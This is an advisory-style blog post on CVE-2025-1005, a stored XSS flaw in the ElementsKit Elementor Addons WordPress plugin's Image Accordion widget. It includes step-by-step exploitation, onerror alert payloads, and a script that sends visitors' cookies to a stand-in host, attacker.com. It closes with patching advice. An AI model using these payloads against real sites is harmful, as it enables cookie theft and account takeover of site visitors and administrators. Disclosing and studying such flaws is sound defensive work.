CVE CyberSecurity Database News

CVE-2025-1005 - How ElementsKit Elementor Addons Plugin for WordPress Can Be Exploited with Stored XSS in the Image Accordion Widget

Poster -

A new security vulnerability, tracked as CVE-2025-1005, has been discovered in the popular WordPress plugin ElementsKit Elementor Addons. This vulnerability affects all plugin versions up to and including 3.4.. The root cause is insufficient input sanitization and output escaping in the plugin’s Image Accordion widget, allowing authenticated attackers—those with at least contributor role—to execute Stored Cross-Site Scripting (Stored XSS) attacks.

This post explains CVE-2025-1005 in simple terms, details the exploitation steps, and provides guidance for mitigation.

What is ElementsKit Elementor Addons Plugin?

ElementsKit is a widely used plugin designed for the Elementor page builder in WordPress. It adds hundreds of extra features and widgets, including the Image Accordion widget, which allows users to create attractive, interactive image sections.

What’s the Vulnerability?

In versions up to 3.4., the Image Accordion widget does not properly sanitize or escape certain attributes supplied by users when configuring the widget. This flaw lets authenticated users with at least contributor access inject malicious scripts into a page.

Whenever a visitor (including administrators) visits that page, the attacker’s script runs in their browser—potentially hijacking session cookies, redirecting traffic, or performing other harmful actions.

References

- Wordfence Advisory
- ElementsKit Plugin Page

Exploiting CVE-2025-1005: Step-by-Step

We’ll use a simple scenario for demonstration purposes.

Attacker has a user account with contributor role or higher

### 1. Go to Add/Edit Page with Elementor

The attacker logs in, goes to Pages > Add New (or existing page), and opens it with Elementor.

2. Add “Image Accordion” Widget

Drag the Image Accordion widget onto the page.

3. Inject Malicious Script

In the widget settings, there is an input field for attributes like Title. Here’s where the attack happens.

The attacker enters the following payload in the Title (or similar) field

<img src="x" onerror="alert('CVE-2025-1005 Exploited!');">

Or a more malicious payload could be

<script>
  // Steal cookies or perform malicious actions
  fetch('https://attacker.com/steal?cookie='; + document.cookie);
</script>

Note: In real-world attacks, the payload is hidden or obfuscated.

4. Save and Publish

The attacker saves the widget and publishes (or submits for review) the page.

5. Trigger XSS

Anyone (visitor, admin, etc.) who loads the infected page will have the injected script executed in their browser.

Persistent: The script stays on the site until removed.

- Escalation: Attackers can steal session cookies of higher-privilege users, potentially escalating their own privileges.
- Wide Impact: Any visitor to the page gets the script executed, which can lead to wider site compromise.

Here’s an example payload

<!-- Payload injected into Image Accordion Title field -->
<img src="invalid" onerror="alert('XSS by CVE-2025-1005')">

After adding and publishing, any user visiting the page would see an alert pop up.

If you use ElementsKit Elementor Addons

- Update the Plugin: Upgrade to the latest version ASAP. The vendor has released a patch in newer versions. Download from here.

Restrict User Roles: Make sure only trusted users have contributor or higher access.

- Scan Your Site: Use tools like Wordfence or Sucuri to detect malware or signs of attack.

Conclusion

CVE-2025-1005 shows how a popular plugin’s small coding mistake can put thousands of sites at risk. If you use ElementsKit Elementor Addons, immediately update the plugin and review your site for signs of compromise.

For more information

- Official Security Advisory (Wordfence)
- CVE Details for CVE-2025-1005 (link may become active after public disclosure)

Timeline

Published on: 02/15/2025 10:15:08 UTC
Last modified on: 02/24/2025 12:31:01 UTC